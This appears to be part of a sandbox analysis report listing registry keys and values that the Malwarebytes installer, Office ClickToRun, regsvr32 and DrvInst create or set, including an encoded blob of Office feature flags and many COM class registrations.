| Set value (data) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\officeclicktorun\ConfigContextData\0.4 = 65726d616e456e744469736162696c69747942696173222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e5368617265642e4772616d6d6172436865636b696e672e4e6f7277656769616e426f6b6d61616c456e746572707269736547726f757031222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e5368617265642e4772617068496d706f72744865647769675558222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e5368617265642e4772617068496d706f7274496e73657274416c6c4f626a6563747356696577222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e5368617265642e47726170686963732e4368616e6765476174652e5570646174655461626c65426f756e6473466f72547970696e67222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e5368617265642e4967782e456e7375726545326f4d6f6e696b65724166746572456e7375726545326f222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e5368617265642e4e6577456e737572655549444c6f676963222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e5368617265642e4f6666696365496e7369646572526567697374726174696f6e222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e5368617265642e5043582e416c6c6f7746696e6450656f706c655573616765496e41744d656e74696f6e222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e5368617265642e5043582e4175746f436f6d706c6574652e46696e6450656f706c65537570706f7274222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e5368617265642e5043582e4669784e6f6e526566436f756e7465644d736f506572736f6e6173222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e5368617265642e5063782e4261636b67726f756e64576f726b436f6e74726f6c6c6572427567466978222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e5368617265642e5063782e427567466978466f7250686f746f41637469766974794c6f6767696e6752656d6f76616c222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e5368617265642e5063782e436f6e746163744361726456324f766572666c6f774d656e7573506861736532222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e5368617265642e5063782e46696e6450656f706c655573616765456e61626c6564222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e5368617265642e5063782e497350656f706c655365617263684578656375746f72456e61626c6564222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e5368617265642e5063782e506378417072696c323031384275674669786573222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e5368617265642e5063782e5063784665627275617279323031384275674669786573222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e5368617265642e5063782e5063784a616e75617279323031384275674669786573222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e5368617265642e5063782e5063784a756e65323031384275674669786573222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e5368617265642e5063782e5063784d61726368323031384275674669786573222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e5368617265642e5063782e557365506378436f6e74616374496e666f4c697374222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e5368617265642e506378417072696c323031374275676669786573222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e5368617265642e506378436f6d6d6f6e436f6d70617265427567466978222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e5368617265642e506378436f6e746163744361726444706941776172656e6573734275674669786573222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e5368617265642e506378436f6e7461637443617264466f6e74486569676874444450494275674669786573222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e5368617265642e5063784a756e65323031374275676669786573222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e5368617265642e5063784d61726368323031384275674669786573222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e5368617265642e5063784f63746f626572323031364275676669786573222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e5368617265642e50656f706c655365617263682e436f6e7461637453656172636849676e6f72657353796d626f6c73222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e5368617265642e50656f706c655365617263682e50637848616e646c65734175746f446973636f766572222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e5368617265642e50656f706c655365617263682e526563697069656e744175746f436f6d706c657465537570706f7274222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e5368617265642e50726f6f66696e672e4175746f4d616e616765722e41637469766974696573222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e5368617265642e536d6172744c696e6b732e416c6c6f775265636f676e697a65536d6172744c696e6b73496e7369646550617261677261706873222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e5368617265642e54686573617572757350616e652e41637469766974696573222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e5368617265642e5472616e736c61746f722e456e61626c65466c6f6f6467617465537572766579222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e5368617265642e5472616e736c61746f722e466c6f6f646761746553757276657944656c6179222c20225622203a2022696e7433325f747c3530303022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e5368617265642e576f72642e46574153686f756c64426c6f636b53656c4368616e67656446616c73654576656e7473222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e5368617265642e576f72642e53656e6445646974466c6167546f4e6f4572726f724576656e7473222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e5368617265642e576f72642e57726974696e67417373697374616e63654372697469717565466f724347415049222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e5368617265642e57726974696e67417373697374616e636555492e50616e652e46697857726f6e67436c6f73654c6f676963222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e536861726564546578742e436f6c6f72466f6e74537570706f7274456e61626c6564222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e536861726564546578742e46696c6556657273696f6e696e67222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e536861726564546578742e48696464656e466f6e7473222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e536861726564546578742e4f4172745465787456616c696461746552616e6765564544222c20225622203a2022696e7433325f747c3322207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e536861726564546578742e52696368456469742e416c6c6f774475706c696361746555696d557064617465222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e536861726564546578742e52696368456469742e436f7079506173746548544d4c222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e536861726564546578742e5472616e7363726962652e436f6e666967436865636b44697361626c6564222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e54656c656d657472792e417269614d617854656172646f776e55706c6f616454696d65496e536563222c20225622203a2022696e7433325f747c3222207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e54656c656d657472792e566f6c756d65547261636b696e674d61784576656e7473222c20225622203a2022696e7433325f747c3530303022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e54656c656d6574727944796e616d6963436f6e6669672e4169725370616365222c20225622203a20227374643a3a77737472696e677c7b205c225375624e616d657370616365735c22203a207b205c224261636b656e645c22203a207b205c224576656e74735c22203a207b205c224c61796572486f7374496e697469616c697a6174696f6e5c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22436f6d706f7369746f7253657373696f6e547970655c22203a207b205c224576656e74466c61675c22203a2032207d207d2c205c225375624e616d657370616365735c22203a207b205c2257696e33325c22203a207b205c225375624e616d657370616365735c22203a207b205c224c65676163795c22203a207b205c224576656e74735c22203a207b205c22416e696d6174696f6e50657263656e74556e64657233304650535c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22416e696d6174696f6e4176674650535c22203a207b205c224576656e74466c61675c22203a2032207d2c205c2243726f737357696e54496d654f6646697273744672616d655c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224176657261676550726573656e74735065725365636f6e645c22203a207b205c224576656e74466c61675c22203a2032207d207d207d207d207d207d207d207d207d22207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e54656c656d6574727944796e616d6963436f6e6669672e4368617274696e67222c20225622203a20227374643a3a77737472696e677c7b205c224576656e74735c22203a207b205c22436861727445326f4c6f61645c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22436861727445326f536176655c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224368617274696e67456e644c6f61645c22203a207b205c224576656e74466c61675c22203a2032207d207d207d22207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e54656c656d6574727944796e616d6963436f6e6669672e436c69636b546f52756e222c20225622203a20227374643a3a77737472696e677c7b205c225375624e616d657370616365735c22203a207b205c225363656e6172696f5c22203a207b205c224576656e74735c22203a207b205c22446f72695461736b5c22203a207b205c224576656e74466c61675c22203a203438383936207d2c205c225570646174655461736b557064617465646574656374696f6e325c22203a207b205c224576656e74466c61675c22203a2032207d2c205c225570646174655461736b557064617465646f776e6c6f61645c22203a207b205c224576656e74466c61675c22203a2032207d2c205c225570646174655461736b557064617465636c69656e74646f776e6c6f61645c22203a207b205c224576656e74466c61675c22203a2032207d2c205c225265706169725461736b46756c6c7265706169725c22203a207b205c224576656e74466c61675c22203a2032207d2c205c225265706169725461736b52656d6f7665696e7374616c6c6174696f6e5c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22496e7374616c6c5461736b436f6e6669677572656c696768745c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22436c69656e747570646174655461736b436c69656e74646f776e6c6f61645c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22496e7374616c6c5461736b53747265616d5c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22496e7374616c6c5461736b437265617465776f726b696e67636f6e66696775726174696f6e5c22203a207b205c224576656e74466c61675c22203a2032207d2c205c225570646174655461736b55706461746566696e616c697a655c22203a207b205c224576656e74466c61675c22203a2032207d207d207d2c205c225461736b4c61737452756e4865617274626561745c22203a207b205c224576656e74735c22203a207b205c225461736b4c61737452756e4865617274626561745c22203a207b205c224576656e74466c61675c22203a2032207d207d207d2c205c22556e6976657273616c426f6f7473747261707065725c22203a207b205c224576656e74735c22203a207b205c224170706c69636174696f6e5c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22457865637574655c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22436f6c6c656374506172616d65746572735c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22436f6c6c656374456d6265646465645369676e61747572655c22203a207b205c224576656e74466c61675c22203a2032207d2c205c2243616c63756c617465506172616d65746572735c22203a207b205c224576656e74466c61675c22203a2032207d207d207d2c205c22436c69656e744361624d616e616765725c22203a207b205c224576656e74735c22203a207b205c225461736b557064617465436c69656e74446f776e6c6f6164446f457865637574655c22203a207b205c224576656e74466c61675c22203a2032207d2c205c225461736b436c69656e74446f776e6c6f6164446f457865637574655c22203a207b205c224576656e74466c61675c22203a2032207d207d207d2c205c2253747265616d4361625c22203a207b205c224576656e74735c22203a207b205c22446f776e6c6f616453747265616d4361625c22203a207b205c224576656e74466c61675c22203a2032207d207d207d2c205c225472616e73706f72745c22203a207b205c225375624e616d657370616365735c22203a207b205c224578706572696d656e74616c5472616e73706f72745c22203a207b205c224576656e74735c22203a207b205c22436162735c22203a207b205c224576656e74466c61675c22203a2032207d207d2c205c224576656e74466c61675c22203a20323536207d207d207d2c205c225472616e73616374696f6e616c46696c654f7065726174696f6e735c22203a207b205c224576656e74735c22203a207b205c224170706c794368616e6765735c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22457865637574655472616e73616374696f6e5c22203a207b205c224576656e74466c61675c22203a2032207d207d207d207d2c205c224576656e74735c22203a207b205c2250726f636573734b696c6c657253687574646f776e5c22203a207b205c224576656e74466c61675c22203a203438383936207d2c205c225472616e73706f72745c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22446f776e6c6f61644361625c22203a207b205c224576656e74466c61675c22203a2032207d207d207d22207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e54656c656d6574727944796e616d6963436f6e6669672e446961676e6f7374696373222c20225622203a20227374643a3a77737472696e677c7b205c225375624e616d657370616365735c22203a207b205c22436f6c6c6563746f725c22203a207b205c224576656e74735c22203a207b205c2253746172745472616365436f6c6c6563746f725c22203a207b205c224576656e74466c61675c22203a20323536207d207d207d207d207d22207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e54656c656d6574727944796e616d6963436f6e6669672e446f6373222c20225622203a20227374643a3a77737472696e677c7b205c224576656e74735c22203a207b205c22536861726564436f6d6d656e74735f447261667443617264556e6d6f756e745c22203a207b205c224576656e74466c61675c22203a2032207d2c205c2245 | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\ExternalFeatureOverrides\officeclicktorun | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\ROOT | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\officeclicktorun | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-19\SOFTWARE\Policies\Microsoft\Office\15.0\Common\Security\Trusted Protocols\All Applications | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\Office\16.0\Common\Security\Trusted Protocols\All Applications\malwarebytes: | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\system32\DrvInst.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\ROOT | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\Office\16.0\Common\Security | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Malwarebytes\FirstRun = "false" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{5F128CCB-D86F-4998-803A-7CD58474FE2C}\ = "IScannerEvents" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{090D2E82-C71B-414E-AF6A-6681A92FF2B3}\TypeLib | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{ED06E075-D1FD-4635-BA17-2F6D6BB0DFD6} | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0713E8D2-850A-101B-AFC0-4210102A8DA7}\ProgID\ = "COMCTL.ProgCtrl.1" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{E6E17E8E-DF38-11CF-8E74-00A0C90F26F8} | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\MB.ScanController\CurVer\ = "MB.ScanController.1" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{E149FEF9-F1DC-4894-8A8E-AA53F6807EFD} | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{B44D50B8-E459-4078-9249-3763459B2676}\TypeLib\ = "{332AFEBA-9341-4CEC-8EA6-DB155A99DF63}" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{616E9BE3-358B-4C06-8AAB-0ACF8D089931}\ProxyStubClsid32 | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{C74190B4-8589-11D1-B16A-00C0F0283628}\TypeLib\Version = "2.0" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{278637DA-FDFB-45C7-8CD8-F2D8A9199AB0}\TypeLib\ = "{A23C190D-C714-42C7-BDBB-F4E1DE65AF27}" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{748A86D4-7EDF-41EF-A1EF-9582643B1C9F}\TypeLib\Version = "1.0" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{71B13605-3569-4F4A-B971-08FF179A3A60} | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{373FF7F0-EB8B-11CD-8820-08002B2F4F5A}\Version\ = "1.3" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\MB.LogController\CurVer\ = "MB.LogController.1" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{090D2E82-C71B-414E-AF6A-6681A92FF2B3} | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{DB82CDC6-F12A-4156-8DBF-EC7465B9C0B9} | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{8640989C-20B4-41BE-BFE1-218EF5B076A6}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{9ED94440-E5E8-101B-B9B5-444553540000}\Implemented Categories\{0DE86A52-2BAA-11CF-A229-00AA003D7352} | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{2C247F26-8591-11D1-B16A-00C0F0283628}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{DD9DA666-8594-11D1-B16A-00C0F0283628}\MiscStatus | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{0468FE5A-FFDA-4F57-83F5-79116160E9B8}\TypeLib\Version = "1.0" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{2C247F26-8591-11D1-B16A-00C0F0283628}\ProxyStubClsid32 | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{5F128CCB-D86F-4998-803A-7CD58474FE2C}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0DB6AD16-564C-451A-A173-0F31A62B7A4D}\ProxyStubClsid32 | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{D8258E71-3A7A-4D9D-85BB-C7999F95B7E4} | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{612A8624-0FB3-11CE-8747-524153480004} | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0713E8D0-850A-101B-AFC0-4210102A8DA7}\ProxyStubClsid32\ = "{00020420-0000-0000-C000-000000000046}" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{C27CCE3B-8596-11D1-B16A-00C0F0283628}\ = "Progress Bar General Property Page Object" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{66833FED-8583-11D1-B16A-00C0F0283628}\ProxyStubClsid32 | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{B38EDC4F-A2CD-4F76-8607-F123FE4031D5}\TypeLib\Version = "1.0" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{76AD4430-9C5C-4FC2-A15F-4E16ACD735AC} | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{F08DF954-8592-11D1-B16A-00C0F0283628}\VersionIndependentProgID | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{A5091804-600E-4226-BF28-80ABFDF4AFAB}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{01222402-A8AB-4183-8843-8ADBF0B11869}\TypeLib\Version = "1.0" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{B860FC17-5606-4F3A-8AE5-E1C139D8BDE3}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0713E8D8-850A-101B-AFC0-4210102A8DA7}\InprocServer32 | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{89AE2EF4-3346-47C7-9DCF-ED3264527FDE} | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{C0CEAFA7-4F65-418C-8A61-92B2048115EE}\ = "ICloudControllerV3" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{983849D5-BFE9-43E9-A9A0-CBAFBC917F39}\ProxyStubClsid32\ = "{00020420-0000-0000-C000-000000000046}" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{956AEAEB-8EA2-4BE1-AAD0-3BE4C986A1CC}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{D7A05281-DB9E-4E02-9680-E4D83CDAA6AB}\TypeLib | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{6B7E6392-850A-101B-AFC0-4210102A8DA7}\1.3\FLAGS\ = "2" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{373FF7F1-EB8B-11CD-8820-08002B2F4F5A}\ProxyStubClsid32 | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{DE6A4256-97CD-4DBB-9D4A-3054B0BB0F8B}\ProxyStubClsid32 | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{00A73BC0-754E-44E1-B190-D59E187A5EA1}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{A0101B90-FD0B-40CF-90E4-33650F09A80F}\TypeLib\ = "{A82129F1-32E1-4D79-A39F-EBFEE53A70BF}" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{2FB37514-21FA-4B2C-94DA-1562126E9F5F} | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{9B1790AB-65B0-4F50-812F-7CC86FA94AF7}\ProxyStubClsid32\ = "{00020420-0000-0000-C000-000000000046}" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{7196E77C-8EA5-4824-92C9-BAE8671149FA}\TypeLib | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{8F1C46F8-E697-4175-B240-CDE682A4BA2D}\LocalServer32 | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{10DAE713-FD88-4ADB-9406-04CB574D543C} | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
